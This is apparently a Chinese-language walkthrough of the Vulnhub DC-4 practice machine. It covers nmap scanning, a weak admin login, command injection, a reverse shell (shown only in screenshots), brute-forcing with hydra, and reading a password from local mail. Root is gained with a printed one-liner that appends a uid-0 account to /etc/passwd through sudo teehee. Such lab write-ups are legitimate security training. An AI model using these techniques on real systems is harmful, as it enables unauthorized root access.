Vulnhub-dc4

靶场下载

https://download.vulnhub.com/dc/DC-4.zip

信息收集

判断目标靶机的存活地址:

Vulnhub-dc4_第1张图片

# nmap -sT --min-rate 10000 -p- 192.168.1.91 -oN port.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 16:36 CST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 89.15% done; ETC: 16:36 (0:00:00 remaining)
Nmap scan report for 192.168.1.91 (192.168.1.91)
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:1F:60:49 (VMware)

探测主机开放的端口信息:22 80端口,显然是在80端口上寻找突破点!

# nmap -sT -sC -sV -O -p22,80 192.168.1.91 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 16:36 CST
Nmap scan report for 192.168.1.91 (192.168.1.91)
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:1F:60:49 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80端口上的信息显示 title位system tools! 然后服务器中间件nginx 1.15.10版本!

# nmap -sT --script=vuln -p22,80 192.168.1.91 -oN vuln.nmap  
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 16:38 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.91 (192.168.1.91)
Host is up (0.00063s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.91
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.91:80/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.1.91:80/login.php
|     Form id: 
|_    Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:1F:60:49 (VMware)

默认漏洞脚本探测出来的信息是存在一个登录的界面,然后就没然后了~

渗透测试

先访问80端口,看看上面存在什么服务:

Vulnhub-dc4_第2张图片

管理员的登陆界面!源码中也没什么东西:

Vulnhub-dc4_第3张图片

先来尝试几个弱口令,和sql注入等:

Vulnhub-dc4_第4张图片

302跳转,跳转之后还是回到了登陆界面:

Vulnhub-dc4_第5张图片

尝试进行爆破但是,会发现一直跳转,于是使用了nikto去探测了一下:

Vulnhub-dc4_第6张图片

也没什么结果,我感觉肯定是弱口令进去,能有命令执行的地方,于是乎,又回到了弱口令上,继续尝试:

admin 111111	登陆成功(马上就要接近去看大佬们的wp的边缘了)

Vulnhub-dc4_第7张图片

进来之后可以命令执行!

Vulnhub-dc4_第8张图片

可以列文件哈:

Vulnhub-dc4_第9张图片

这里抓包看看数据包中 是不是存在着命令。

Vulnhub-dc4_第10张图片

果然猜测的一点点问题都没有哈!存在POST方式传递的命令,尝试直接修改命令:

Vulnhub-dc4_第11张图片

先随便看看文件内容是啥,然后尝试去反弹shell:

Vulnhub-dc4_第12张图片

同时kali起监听:

Vulnhub-dc4_第13张图片

准备提权啦!看了下文件login.php中的内容,居然密码是happy,那么为什么登陆进来了?

提权

Vulnhub-dc4_第14张图片

首先确认靶标信息是没什么问题的,就是我们的目标机器!

Vulnhub-dc4_第15张图片

没有任何的sudo权限;

Vulnhub-dc4_第16张图片

查看了/etc/passwd文件,发现了这个文件存在几个活跃的用户!

Vulnhub-dc4_第17张图片

于是分别进入到这三个用户的家目录下面,看看都存在什么东西:在jim家目录下面发现了一个文件,具有777的权限!

Vulnhub-dc4_第18张图片

test.sh文件居然是777的权限哈!看看这个文件干了什么:

Vulnhub-dc4_第19张图片

输出了几句话~ 看看定时任务中是否执行了这个文件:

Vulnhub-dc4_第20张图片

可是没有定时任务,那么这个文件貌似就没什么用处! 但是这个文件一看就是提权文件!继续看看其他的东西,于是发现了backups目录,进去看看:

Vulnhub-dc4_第21张图片

发现了之前的密码的备份文件,查看该文件中的内容:

Vulnhub-dc4_第22张图片

发现了很多的密码,这里尝试将他们复制出来,利用hydra进行爆破即可!

Vulnhub-dc4_第23张图片

拿到了账号和密码信息,ok了;直接登陆吧!

Vulnhub-dc4_第24张图片

sam家目录下面什么都没有;(上面再进行爆破,速度比较慢)

Vulnhub-dc4_第25张图片

没什么问题哈 ,直接ssh登陆进来!这次再看一下sudo权限:

Vulnhub-dc4_第26张图片

哦,还是没有sudo权限,我还以为是能以root权限去执行test.sh呢 想多了~ 还是去看一下suid权限的文件:

Vulnhub-dc4_第27张图片

但是还是无法提权。于是往回看,发现再ssh连接成功的时候,提示了一句you have mail

Vulnhub-dc4_第28张图片

会想到jim家目录下面的mbox:

Vulnhub-dc4_第29张图片

看到确实是存在邮箱信息,直接find命令找一下吧:

find / -name "mail" 2>/dev/null

Vulnhub-dc4_第30张图片

于是在/var/mail下面发现了jim文件:

Vulnhub-dc4_第31张图片

这个文件中存在一个密码,这个邮件是charles发给jim的,里面有个密码!先翻译下:

Vulnhub-dc4_第32张图片

哦,登录的密码,直接ssh吧:

^xHhA&hvim0y

ssh登陆成功之后,又去看了sudo:

Vulnhub-dc4_第33张图片

teehee是一个小众的linux编辑器,这里存在sudo权限,因此可以用来做提权!核心思路是利用起在passwd文件中追加一条uid为0 的用户条目:

echo 'root1:$1$iQZA4LYc$DGBqvpQpPjAjXa7OsfMBf/:0:0:root:/root:/bin/bash' | sudo /usr/bin/teehee -a /etc/passwd

Vulnhub-dc4_第34张图片

添加成功,切换到root1:

Vulnhub-dc4_第35张图片

读取flag文件:

Vulnhub-dc4_第36张图片

你可能感兴趣的:(Vulnhub,网络安全,安全,学习,web安全,安全威胁分析)